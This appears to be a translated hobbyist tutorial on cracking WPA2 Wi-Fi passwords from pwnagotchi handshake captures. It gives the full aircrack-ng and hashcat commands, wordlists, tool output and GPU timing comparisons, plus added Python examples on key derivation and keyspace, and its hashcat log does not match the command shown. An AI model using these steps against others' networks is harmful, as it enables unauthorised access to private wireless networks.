History
2021/08/14 hashcat -m 2500 has been deprecated. Use hashcat -m 22000 instead.
2021/06/18 The free tier of Google Colaboratory no longer lets me use it.
Analyzing pcap files
How to build a pwnagotchi is described here ( https://qiita.com/k0uj1k/items/f91a3b7e3a4b9209774f )
Bring the pcap files of the handshakes captured by pwnagotchi over to Kali Linux.
Then check them against a dictionary.
Downloading the dictionary
# git clone https://github.com/kennyn510/wpa2-wordlists.git
Importing from pwnagotchi
damedame_xxxxxxxxxxxxxx.pcap is the file analyzed here.
Make the handshakes directory accessible from Kali Linux.
From here on,
# scp -pr pi@10.0.0.2:/home/pi/handshakes ~
# cp ~/handshakes/damedame_xxxxxxxxxxxxxx.pcap ~/work
# cd work
the work is done in the work directory.
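Analysis with aircrack-ng
The ESSID is required as an argument. In most cases the part of the file name before the _ is the ESSID, but if the ESSID contains characters such as -, it may differ from the file name, so check it with tshark.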
# tshark -r damedame_xxxxxxxxxxxxxx.pcap
(omitted)
4 -0.016541 ABCDEFG_aa:aa:aa → Apple_00:00:00 802.11 209 Probe Response, SN=2282, FN=0, Flags=........C, BI=100, SSID=damedame
(omitted)
This confirms SSID=damedame.
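Why the exact ESSID matters: in WPA2-PSK the ESSID is the salt of the PBKDF2 key derivation (the hashcat log on this page names the hash type WPA-EAPOL-PBKDF2), so a name guessed from the file name that is off by one character yields a different key. The following is an added example, not code from the original article; the helper names, the hyphenated SSID and the file name in it are constructed for illustration.

```python
import hashlib


def wpa2_pmk(passphrase: str, essid: str) -> bytes:
    """Derive the 256-bit WPA2-PSK pairwise master key (PMK)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA2 passphrase is 8 to 63 characters long")
    if not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("a WPA2 passphrase is printable ASCII")
    salt = essid.encode("utf-8")
    if not 1 <= len(salt) <= 32:
        raise ValueError("an SSID is 1 to 32 bytes long")
    # The ESSID is the PBKDF2 salt; every guess costs 4096 HMAC-SHA1 rounds.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), salt, 4096, 32)


def essid_from_filename(pcap_name: str) -> str:
    """The shortcut from the text: whatever precedes the last '_'."""
    return pcap_name.rsplit("_", 1)[0]


def same_key(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True only if both ESSIDs yield the same PMK for this passphrase."""
    return wpa2_pmk(passphrase, essid_a) == wpa2_pmk(passphrase, essid_b)


if __name__ == "__main__":
    # Constructed sample: the network broadcasts "dame-dame", while the
    # capture file name (hypothetical) has lost the hyphen.
    guessed = essid_from_filename("damedame_aabbccddeeff.pcap")
    broadcast = "dame-dame"
    print("guessed from file name:", guessed)
    print("same PMK as broadcast ESSID:", same_key("password123", guessed, broadcast))
```

The length check mirrors the "Minimum/Maximum password length supported by kernel" lines in the hashcat output further down the page.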
aircrack-ng
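Run the analysis using the downloaded dictionary.
# As an example, this time I used a narrowed-down dictionary containing only entries that start with "P".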
# aircrack-ng damedame_xxxxxxxxxxxxxx.pcap -w wpa2-wordlists/Wordlists/Rockyou/P.txt -e damedame
The display switches to the analysis screen (full screen).
Analysis screen
The dictionary matching proceeds.
Aircrack-ng 1.6
[00:00:16] 53586/536377 keys tested (3401.86 k/s)
Time left: 2 minutes, 21 seconds 9.99%
KEY FOUND! [ password123 ]
Master Key : 6C DC 28 E5 EE D6 0D D3 24 8D 42 A9 94 FA 40 DA
8F C6 7B 3B BB 4E F2 32 84 48 E7 D5 47 3A A4 E7
Transient Key : D8 8F 19 22 3B 86 AD B3 25 E7 E4 93 BA 54 9D A4
95 0E D5 5F 6F 8B 09 BE 26 D0 91 F5 47 90 3F 11
9A AB 21 45 F3 EC 45 F4 0C 19 02 13 7C DB 8E 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : CB A5 D7 88 A6 CF 36 71 CB 53 F6 EB CC 8C BE CC
Oops, it was found.
It took about two and a half minutes.
Analysis with hashcat
To convert the pcap file to an hccapx file, hashcat-utils is used.
Building hashcat-utils
# git clone https://github.com/hashcat/hashcat-utils
# cd hashcat-utils
# cd src
# make
# cd ../..
Converting the pcap file
Upload the pcap file, convert it, and then download the result.
You get a file with the hc22000 extension, such as zzzzzz.hc22000.
hashcat -m22000
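Here too, the analysis uses the downloaded dictionary.
# As an example, this time I used a narrowed-down dictionary containing only entries that start with "P".
# -m 22000 reads the converted .hc22000 file (the log below, from hashcat v5.1.0, still shows the .hccapx target).
# hashcat --force -m 22000 zzzzzz.hc22000 wpa2-wordlists/Wordlists/Rockyou/P.txt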
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz, 1024/2955 MB allocatable, 2MCU
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=2500 -D _unroll'
Dictionary cache built:
* Filename..: wpa2-wordlists/Wordlists/Rockyou/P.txt
* Passwords.: 536377
* Bytes.....: 5367337
* Keyspace..: 536377
* Runtime...: 0 secs
346f71dc3e3a2693d747d437217829e5:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
17d763d85546808a1a77ac2228c1c3c7:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
41e2bb5f70b2ca7ae6b25832342b06c6:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
04173eeb81c18a45d16816d063ec0479:yyyyyyyyyyyy:xxxxxxxxxxxx:damedame:password123
b4fe69e2cfcc15df3caffe4b6adc3a2a:yyyyyyyyyyyy:zzzzzzzzzzzz:damedame:password123
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
It was found again.
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed May 6 20:27:58 2020 (26 secs)
Time.Estimated...: Wed May 6 20:30:03 2020 (1 min, 39 secs)
Guess.Base.......: File (wpa2-wordlists/Wordlists/Rockyou/P.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3807 H/s (6.84ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 5/6 (83.33%) Digests, 0/1 (0.00%) Salts
Progress.........: 157123/536377 (29.29%)
Rejected.........: 58819/157123 (37.44%)
Restore.Point....: 156773/536377 (29.23%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3712-3840
Candidates.#1....: putol_003 -> putalamierda5673
About a minute and a half, then.
hashcat can also run the analysis without a dictionary, but https://hashcat.net/hashcat/ states the following:
GPU Driver requirements:
- AMD GPUs on Linux require "RadeonOpenCompute (ROCm)" Software Platform (1.6.180 or later)
- AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
- Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
- Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
- Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
- NVIDIA GPUs require "NVIDIA Driver" (367.x or later)
So a GPU driver is required.
Without one, it takes an enormous amount of time.
Session..........: hashcat
Status...........: Quit
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxxxx.hccapx
Time.Started.....: Wed Jun 3 15:16:52 2020 (3 mins, 39 secs)
Time.Estimated...: Next Big Bang (9196 years, 212 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 7196 H/s (393.18ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1
Recovered........: 0/94 (0.00%) Digests
Progress.........: 1572864/2088270645760000 (0.00%)
Rejected.........: 0/1572864 (0.00%)
Restore.Point....: 49152/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:18-19 Iteration:0-94
Candidates.#1....: wtfwnane1234 -> wwvgonan1234
It would take 9200 years.
I would like to run this flat out on a GPU.
Google Colaboratory
I wanted to run a GPU flat out for free, so I tried it on Google Colaboratory.
hashcat (v6.0.0-33-g75d801e1) starting...
* Device #1: This hardware has outdated CUDA compute capability (3.7).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: This hardware has outdated CUDA compute capability (3.7).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 10.1)
====================
* Device #1: Tesla K80, 11373/11441 MB, 13MCU
OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla K80, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 292 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 09:05:02 2020 (20 secs)
Time.Estimated...: Wed Jun 25 18:01:21 2769 (748 years, 350 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 88356 H/s (73.13ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 1703936/2088270645760000 (0.00%)
Rejected.........: 0/1703936 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:4-5 Iteration:832-896
Candidates.#1....: aarierin1234 -> aqmbxxxx1234
Hardware.Mon.#1..: Temp: 50c Util:100% Core: 823MHz Mem:2505MHz Bus:16
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Even with a Tesla K80, 2860/11441 MB allocatable, 13MCU, it takes 750 years!
hashcat (v6.0.0-34-g57776832) starting...
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 10.1)
====================
* Device #1: Tesla T4, 14969/15079 MB, 40MCU
OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla T4, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 766 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Fri Jul 10 12:51:07 2020 (26 secs)
Time.Estimated...: Mon Dec 21 14:26:15 2212 (192 years, 163 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 343.9 kH/s (58.81ms) @ Accel:8 Loops:256 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 8847360/2088270645760000 (0.00%)
Rejected.........: 0/8847360 (0.00%)
Restore.Point....: 327680/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:1-2 Iteration:512-768
Candidates.#1....: mefjyone1234 -> midgkine1234
Hardware.Mon.#1..: Temp: 62c Util:100% Core:1200MHz Mem:5000MHz Bus:16
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
I happened to get a Tesla T4, 14969/15079 MB, 40MCU, but even with this it takes 193 years!
hashcat (v6.0.0-34-g57776832) starting...
nvmlDeviceGetFanSpeed(): Not Supported
CUDA API (CUDA 10.1)
====================
* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU
OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla P100-PCIE-16GB, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 7 digests; 6 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1047 MB
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
Session..........: hashcat
Status...........: Running
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: damedame_xxxxxxxxxxxx.hccapx
Time.Started.....: Sat Jul 11 12:11:10 2020 (25 secs)
Time.Estimated...: Fri Apr 1 19:23:00 2163 (142 years, 264 days)
Guess.Mask.......: ?l?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 463.7 kH/s (60.73ms) @ Accel:16 Loops:128 Thr:1024 Vec:1
Recovered........: 0/6 (0.00%) Digests
Progress.........: 11010048/2088270645760000 (0.00%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 0/80318101760000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:12-13 Iteration:2176-2304
Candidates.#1....: harierin1234 -> hwhieyon1234
Hardware.Mon.#1..: Temp: 49c Util:100% Core:1328MHz Mem: 715MHz Bus:16
With a Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU, it takes 143 years.
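The estimates in the status screens above follow directly from the mask and the reported speed, which also gives a quick way to judge how long a passphrase of a given shape holds up. The following is an added example, not part of the original article; the helper names are hypothetical, and the mask, speeds and dictionary size are the ones printed on this page.

```python
# hashcat built-in charsets: ?l lower, ?u upper, ?d digits, ?s symbols, ?a all four
CHARSET_SIZE = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}
SECONDS_PER_YEAR = 365 * 24 * 3600


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat-style mask generates."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] != "?":          # literal character: exactly one choice
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        key = mask[i + 1]
        if key != "?":              # '??' stands for a literal question mark
            if key not in CHARSET_SIZE:
                raise ValueError(f"unsupported charset ?{key}")
            total *= CHARSET_SIZE[key]
        i += 2
    return total


def years_to_exhaust(candidates: int, hashes_per_second: float) -> float:
    """Worst case: every candidate is tried before the last one matches."""
    return candidates / hashes_per_second / SECONDS_PER_YEAR


# Values copied from the status screens on this page.
PAGE_MASK = "?l?l?l?l?l?l?l?l?d?d?d?d"
PAGE_SPEEDS = {"no GPU driver": 7196, "Tesla K80": 88356,
               "Tesla T4": 343_900, "Tesla P100": 463_700}
PAGE_DICT_WORDS, PAGE_DICT_SPEED = 536377, 3807


def page_estimates() -> dict:
    """Years to exhaust PAGE_MASK at each speed reported on the page."""
    space = mask_keyspace(PAGE_MASK)
    return {name: years_to_exhaust(space, hps) for name, hps in PAGE_SPEEDS.items()}


if __name__ == "__main__":
    print("mask keyspace:", mask_keyspace(PAGE_MASK))
    for name, years in page_estimates().items():
        print(f"{name:>14}: {years:8.1f} years")
    print("dictionary run:", round(PAGE_DICT_WORDS / PAGE_DICT_SPEED), "seconds")
```

Each additional lowercase letter multiplies the keyspace by 26, whereas the dictionary run finished in minutes because password123 was in the list.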